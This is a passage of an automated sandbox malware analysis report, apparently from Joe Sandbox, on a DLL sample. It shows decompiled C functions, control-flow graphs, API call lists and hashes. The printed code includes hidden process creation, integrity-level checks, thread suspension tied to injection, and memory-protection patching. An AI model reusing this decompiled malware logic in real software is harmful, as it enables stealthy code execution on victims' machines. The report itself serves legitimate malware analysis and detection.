                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                • String ID:
                • API String ID: 3676034644-0
                • Opcode ID: e7ca2a9e14bd9285b9bc6969066ccc7e7e011669c5eeac810b5fcde9cb3a99a0
                • Instruction ID: 1b43de68f68c87c17024148dd11acf3aaaa2a3bb0c5056b1eaddeb40fb611e04
                • Opcode Fuzzy Hash: e7ca2a9e14bd9285b9bc6969066ccc7e7e011669c5eeac810b5fcde9cb3a99a0
                • Instruction Fuzzy Hash: 88412DB1A0170A9FDB219FA6CC44EBAB7F8FB08714F008515E656A7690E775F805DB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11212 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 299 1c11212-1c11235 call 1c121fa 302 1c11342-1c11349 299->302 303 1c1123b-1c11254 call 1c17a9c 299->303 307 1c11330-1c1133d call 1c12c11 303->307 308 1c1125a-1c11261 303->308 307->302 308->307 309 1c11267-1c11299 memset call 1c16ee4 308->309 313 1c11329 309->313 314 1c1129f-1c112c3 GetModuleHandleA GetProcAddress 309->314 313->307 316 1c11312 314->316 317 1c112c5-1c112e5 call 1c16cfd 314->317 319 1c11319-1c11327 316->319 328 1c112e6 call 46c380b 317->328 329 1c112e6 call 46cfdc6 317->329 330 1c112e6 call 46c6552 317->330 319->307 323 1c112e8-1c112f3 call 1c16cfd 326 1c112f5-1c11305 CloseHandle * 2 323->326 327 1c11307-1c11310 GetLastError 323->327 326->319 327->319 328->323 329->323 330->323
                C-Code - Quality: 73%
                			E01C11212(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E01C121FA(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E01C17A9C( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x1c1a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x1c1a2d8; // 0x55d5a8
					_t18 = _t47 + 0x1c1b3b3; // 0x73797325
					_t68 = E01C16EE4(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x1c1a2d8; // 0x55d5a8
						_t19 = _t50 + 0x1c1b760; // 0x2178d08
						_t20 = _t50 + 0x1c1b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E01C16CFD();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E01C16CFD();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x1c1a290, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E01C12C11(_t70);
				goto L12;
			}


















                0x01c1121a
                0x01c1121a
                0x01c11229
                0x01c11232
                0x01c11235
                0x01c11342
                0x01c11349
                0x01c11349
                0x01c11244
                0x01c1124c
                0x01c11251
                0x01c11254
                0x01c11269
                0x01c1126f
                0x01c11270
                0x01c11273
                0x01c11279
                0x01c1127c
                0x01c11281
                0x01c11289
                0x01c11295
                0x01c11299
                0x01c11329
                0x01c1129f
                0x01c1129f
                0x01c112a4
                0x01c112ab
                0x01c112bf
                0x01c112c3
                0x01c11312
                0x01c112c5
                0x01c112c6
                0x01c112cd
                0x01c112e6
                0x01c112e8
                0x01c112ec
                0x01c112f3
                0x01c1130d
                0x01c112f5
                0x01c112fe
                0x01c11303
                0x01c11303
                0x01c112f3
                0x01c11321
                0x01c11321
                0x01c11299
                0x01c11330
                0x01c11339
                0x01c1133d
                0x00000000

                APIs
                  • Part of subcall function 01C121FA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01C1122E,?,?,?,?,00000000,00000000), ref: 01C1221F
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01C12241
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 01C12257
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01C1226D
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01C12283
                  • Part of subcall function 01C121FA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01C12299
                • memset.NTDLL ref: 01C1127C
                  • Part of subcall function 01C16EE4: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,01C11295,73797325), ref: 01C16EF5
                  • Part of subcall function 01C16EE4: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01C16F0F
                • GetModuleHandleA.KERNEL32(4E52454B,02178D08,73797325), ref: 01C112B2
                • GetProcAddress.KERNEL32(00000000), ref: 01C112B9
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C11321
                  • Part of subcall function 01C16CFD: GetProcAddress.KERNEL32(36776F57,01C160F7), ref: 01C16D18
                • CloseHandle.KERNEL32(00000000,00000001), ref: 01C112FE
                • CloseHandle.KERNEL32(?), ref: 01C11303
                • GetLastError.KERNEL32(00000001), ref: 01C11307
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID: Ut
                • API String ID: 3075724336-8415677
                • Opcode ID: bb43ad4cc2bf64cc4ab27a9f9c8c5f10342cb2f4e6e7abc0d9e8eb9e13143721
                • Instruction ID: 595bd6743d5ff0415f56cf557a0e069ca79d64b00203afb10e611bfab13e24ac
                • Opcode Fuzzy Hash: bb43ad4cc2bf64cc4ab27a9f9c8c5f10342cb2f4e6e7abc0d9e8eb9e13143721
                • Instruction Fuzzy Hash: A63170B2840219EFDB21AFA4DC88E9EBBBCFB0A344F544465E606E3118D675DE44EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D8CCE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 046D7254: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6), ref: 046D7279
                  • Part of subcall function 046D7254: GetLastError.KERNEL32(?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D7281
                  • Part of subcall function 046D7254: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F), ref: 046D7298
                  • Part of subcall function 046D7254: VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7), ref: 046D72BD
                • GetLastError.KERNEL32(00000000,00000004,00000002,00000000,?,00000000,00000000,046EA580,0000001C,046DBB7F,00000002,?,00000001,00000000,046ED514,00000000), ref: 046D8E27
                  • Part of subcall function 046D4D6C: lstrlen.KERNEL32(8B000000,046CB526,?,046CB526,00000004), ref: 046D4DA4
                  • Part of subcall function 046D4D6C: lstrcpy.KERNEL32(00000000,8B000000), ref: 046D4DBB
                  • Part of subcall function 046D4D6C: StrChrA.SHLWAPI(00000000,0000002E,?,046CB526,00000004), ref: 046D4DC4
                  • Part of subcall function 046D4D6C: GetModuleHandleA.KERNEL32(00000000,?,046CB526,00000004), ref: 046D4DE2
                • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 046D8DA5
                • VirtualProtect.KERNELBASE(046CB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,046EA580,0000001C,046DBB7F), ref: 046D8DC0
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8DE4
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D8E02
                  • Part of subcall function 046D7254: SetLastError.KERNEL32(00000000,?,00000000,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046D72C6
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                • String ID:
                • API String ID: 899430048-3916222277
                • Opcode ID: 57d5aa628b3118193a745a41ff2f0c67bb37a2d5fd84bbeb48b17c6f102144f3
                • Instruction ID: e1edcb3b17431aacebb281d14703eb7688c1b720bac2fe4a857bb4f2c6832954
                • Opcode Fuzzy Hash: 57d5aa628b3118193a745a41ff2f0c67bb37a2d5fd84bbeb48b17c6f102144f3
                • Instruction Fuzzy Hash: 77416F71900615EFDB10EF69C848AADFBF4FF58310F14811AE925AB290E734E951CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D4428 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 409 46d4428-46d4467 call 46ce4dc VirtualAlloc 412 46d446d-46d4478 call 46ce4dc 409->412 413 46d4538 409->413 416 46d447d-46d4483 412->416 415 46d4540-46d4542 413->415 417 46d4544-46d454c VirtualFree 415->417 418 46d4552-46d455d 415->418 419 46d44ab-46d44ad 416->419 420 46d4485-46d4489 416->420 417->418 419->413 421 46d44b3-46d44b7 419->421 420->419 422 46d448b-46d44a9 VirtualFree VirtualAlloc 420->422 421->413 423 46d44b9-46d44c4 421->423 422->412 422->419 423->415 424 46d44c6 423->424 425 46d44cc-46d44d9 424->425 426 46d44db-46d44e4 lstrcmpi 425->426 427 46d4515-46d452f 425->427 426->427 428 46d44e6-46d44f1 StrChrA 426->428 427->415 429 46d4531-46d4536 427->429 430 46d4501-46d4511 428->430 431 46d44f3-46d44ff lstrcmpi 428->431 429->415 430->425 432 46d4513 430->432 431->427 431->430 432->415
                APIs
                  • Part of subcall function 046CE4DC: GetProcAddress.KERNEL32(?,00000318), ref: 046CE501
                  • Part of subcall function 046CE4DC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 046CE51D
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 046D4461
                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 046D454C
                  • Part of subcall function 046CE4DC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 046CE687
                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 046D4497
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 046D44A3
                • lstrcmpi.KERNEL32(?,00000000), ref: 046D44E0
                • StrChrA.SHLWAPI(?,0000002E), ref: 046D44E9
                • lstrcmpi.KERNEL32(?,00000000), ref: 046D44FB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                • String ID:
                • API String ID: 3901270786-0
                • Opcode ID: 605b343dc45e6e25877a4d22d7779d0640bc64a30c20803ef593947cdfbe7878
                • Instruction ID: a96ecc12ac639847a7c80aec80610dc894d63d0dab12f6dfd5c16957e8edbecb
                • Opcode Fuzzy Hash: 605b343dc45e6e25877a4d22d7779d0640bc64a30c20803ef593947cdfbe7878
                • Instruction Fuzzy Hash: FE316071904315ABD321DF11DC44B2BBBE8FF88B58F114A19F98967240EB34ED04CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D0EE7 Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 046CF607: memset.NTDLL ref: 046CF611
                • OpenEventA.KERNEL32(00000002,00000000,046EE374,?,00000000,00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64), ref: 046D0F81
                • SetEvent.KERNEL32(00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0F8E
                • Sleep.KERNELBASE(00000BB8,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0F99
                • ResetEvent.KERNEL32(00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0FA0
                • CloseHandle.KERNEL32(00000000,?,046DE99E,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D0FA7
                • GetShellWindow.USER32 ref: 046D0FB2
                • GetWindowThreadProcessId.USER32(00000000), ref: 046D0FB9
                  • Part of subcall function 046DBB9E: RegCloseKey.ADVAPI32(046DE99E), ref: 046DBC21
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                • String ID:
                • API String ID: 53838381-0
                • Opcode ID: 0cf54c86bd220c36ceb476e576e070538bf171571d5fb03bf2ffeb010f5c1460
                • Instruction ID: 78ce17f84342d6607bb36984e93650b094ef5fc505f9a17e0282df0a653dc50e
                • Opcode Fuzzy Hash: 0cf54c86bd220c36ceb476e576e070538bf171571d5fb03bf2ffeb010f5c1460
                • Instruction Fuzzy Hash: F5214132600610BBD3146B67DC48E6B7BA9EBC9755F209109F9099B281FB3ABC01CB75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C15B49 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C15B49(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x1c1a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E01C12114(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E01C12C11(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                0x01c15b56
                0x01c15b5d
                0x01c15b64
                0x01c15b78
                0x01c15b83
                0x01c15b9b
                0x01c15ba8
                0x01c15bab
                0x01c15bb0
                0x01c15bbb
                0x01c15bbf
                0x01c15bce
                0x01c15bd2
                0x01c15bee
                0x01c15bee
                0x01c15bf2
                0x01c15bf2
                0x01c15bf7
                0x01c15bfb
                0x01c15c01
                0x01c15c02
                0x01c15c09
                0x01c15c0f

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01C15B7B
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01C15B9B
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01C15BAB
                • CloseHandle.KERNEL32(00000000), ref: 01C15BFB
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01C15BCE
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01C15BD6
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01C15BE6
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: 10e5704b6ea881de57b2f46ff47179e2234cb7cbc005aca5265b05e24a04fad8
                • Instruction ID: 3b0f704e2a1eb049988a2a3596446daa55ac36b1748a76a9511ec826d7015d13
                • Opcode Fuzzy Hash: 10e5704b6ea881de57b2f46ff47179e2234cb7cbc005aca5265b05e24a04fad8
                • Instruction Fuzzy Hash: D3213975940259FFEB109F94DC84EEEBBB9FB4A304F1040A6EA12A3154C771CB44EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C152C4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E01C152C4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x1c1a2d8; // 0x55d5a8
				_t1 = _t9 + 0x1c1b62c; // 0x253d7325
				_t36 = 0;
				_t28 = E01C13CE5(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E01C12114(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E01C11628(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E01C12C11(_t40);
						_t42 = E01C173CA(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E01C12C11(_t36);
							_t36 = _t42;
						}
						_t43 = E01C12A4E(_t36, _t33);
						if(_t43 != 0) {
							E01C12C11(_t36);
							_t36 = _t43;
						}
					}
					E01C12C11(_t28);
				}
				return _t36;
			}
















                0x01c152c4
                0x01c152c7
                0x01c152c8
                0x01c152cf
                0x01c152d6
                0x01c152dd
                0x01c152e1
                0x01c152e8
                0x01c152ef
                0x01c152f4
                0x01c15306
                0x01c1530a
                0x01c1530e
                0x01c15314
                0x01c15319
                0x01c15323
                0x01c15329
                0x01c1532b
                0x01c15342
                0x01c15346
                0x01c15349
                0x01c1534e
                0x01c1534e
                0x01c15357
                0x01c1535b
                0x01c1535e
                0x01c15363
                0x01c15363
                0x01c1535b
                0x01c15366
                0x01c1536b
                0x01c15371

                APIs
                  • Part of subcall function 01C13CE5: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,01C152DD,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C13D4C
                  • Part of subcall function 01C13CE5: sprintf.NTDLL ref: 01C13D6D
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C152EF
                • lstrlen.KERNEL32(?,?,?,01C17675,?,021795B0), ref: 01C152F7
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • strcpy.NTDLL ref: 01C1530E
                • lstrcat.KERNEL32(00000000,?), ref: 01C15319
                  • Part of subcall function 01C11628: lstrlen.KERNEL32(?,?,?,00000000,?,01C15328,00000000,?,?,?,01C17675,?,021795B0), ref: 01C11639
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01C17675,?,021795B0), ref: 01C15336
                  • Part of subcall function 01C173CA: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,01C15342,00000000,?,?,01C17675,?,021795B0), ref: 01C173D4
                  • Part of subcall function 01C173CA: _snprintf.NTDLL ref: 01C17432
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: c2946413e49c18e249382e4da44f36cdab2f93264e9f56799c19049f3236dcbd
                • Instruction ID: bc3d608ba5ba5f7a57c6cd66ab38460ee3907f937ecf4a5e004aa7b00469593c
                • Opcode Fuzzy Hash: c2946413e49c18e249382e4da44f36cdab2f93264e9f56799c19049f3236dcbd
                • Instruction Fuzzy Hash: 4111EC37981526F757127BB88C95CAF3B9DAFAB9607190015FB019710CDEB9CE0277A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D4B65 Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046D4B88
                  • Part of subcall function 046CAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,046C1DC6,00000000), ref: 046CAEE6
                  • Part of subcall function 046CAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 046CAEFF
                  • Part of subcall function 046CAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF1C
                  • Part of subcall function 046CAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF2D
                  • Part of subcall function 046CAEC5: CloseHandle.KERNEL32(?,?,?,?,046C1DC6,00000000), ref: 046CAF40
                • ResumeThread.KERNEL32(00000004,?,00000000,00000000,00000004,?,00000000,00000000,74E04EE0,00000000), ref: 046D4C42
                • WaitForSingleObject.KERNEL32(00000064), ref: 046D4C50
                • SuspendThread.KERNEL32(00000004), ref: 046D4C63
                  • Part of subcall function 046CA7FE: memset.NTDLL ref: 046CAABF
                • ResumeThread.KERNELBASE(00000004), ref: 046D4CE6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSingleSuspendWaitWow64
                • String ID:
                • API String ID: 223543837-0
                • Opcode ID: 03a8ade4e4dd8eeb7046d5287dffb1a3e48ed9b3f4ed2517dc42d5247ba7632c
                • Instruction ID: dd8f5352518b7d1a8a689c6097500f604f4054873586425c6bc072c4e60ac9ec
                • Opcode Fuzzy Hash: 03a8ade4e4dd8eeb7046d5287dffb1a3e48ed9b3f4ed2517dc42d5247ba7632c
                • Instruction Fuzzy Hash: 5B418CB1900248AFEB21AF95CC84AAE7BB9FF44308F044569E91597250FB35AE51CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12D2F Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 01C163FF: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,021789D4,01C12D5F,?,?,?,?,?,?,?,?,?,?,?,01C12D5F), ref: 01C164CB
                  • Part of subcall function 01C13318: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01C13355
                  • Part of subcall function 01C13318: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 01C13386
                • SysAllocString.OLEAUT32(00000000), ref: 01C12D8B
                • SysAllocString.OLEAUT32(0070006F), ref: 01C12D9F
                • SysAllocString.OLEAUT32(00000000), ref: 01C12DB1
                • SysFreeString.OLEAUT32(00000000), ref: 01C12E15
                • SysFreeString.OLEAUT32(00000000), ref: 01C12E24
                • SysFreeString.OLEAUT32(00000000), ref: 01C12E2F
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                • String ID:
                • API String ID: 2831207796-0
                • Opcode ID: 59996a6351fa6befec7d214d53b67f73d94f915b0e79e96ec9d8531000fb8c0c
                • Instruction ID: 3fedf92b707321c24befd49751818a38e944eee897e7ee173fe409b9f9b3682d
                • Opcode Fuzzy Hash: 59996a6351fa6befec7d214d53b67f73d94f915b0e79e96ec9d8531000fb8c0c
                • Instruction Fuzzy Hash: 03315E36D00609EFDB11DFACC84469FBBB6AF4A201F144465EE11EB224DB71DA06CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C6D4C Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,?,046ED514,?,046EA590,00000018,046CB772,00000000,00000002,046ED518,00000003,046ED514,00000000,005A95A8), ref: 046C6D8F
                • VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,046ED514,?,046EA590,00000018,046CB772), ref: 046C6E1A
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046C6E42
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046C6E60
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                • String ID:
                • API String ID: 3666628472-0
                • Opcode ID: 1b97d9d344addab490e636e31f1b9cb9839d1ebf3242cec5c8df4224784e0f48
                • Instruction ID: 3c7bfd3ce22460c4319eadc2832b2765967fa160f937a5355aa76fa16465b6b4
                • Opcode Fuzzy Hash: 1b97d9d344addab490e636e31f1b9cb9839d1ebf3242cec5c8df4224784e0f48
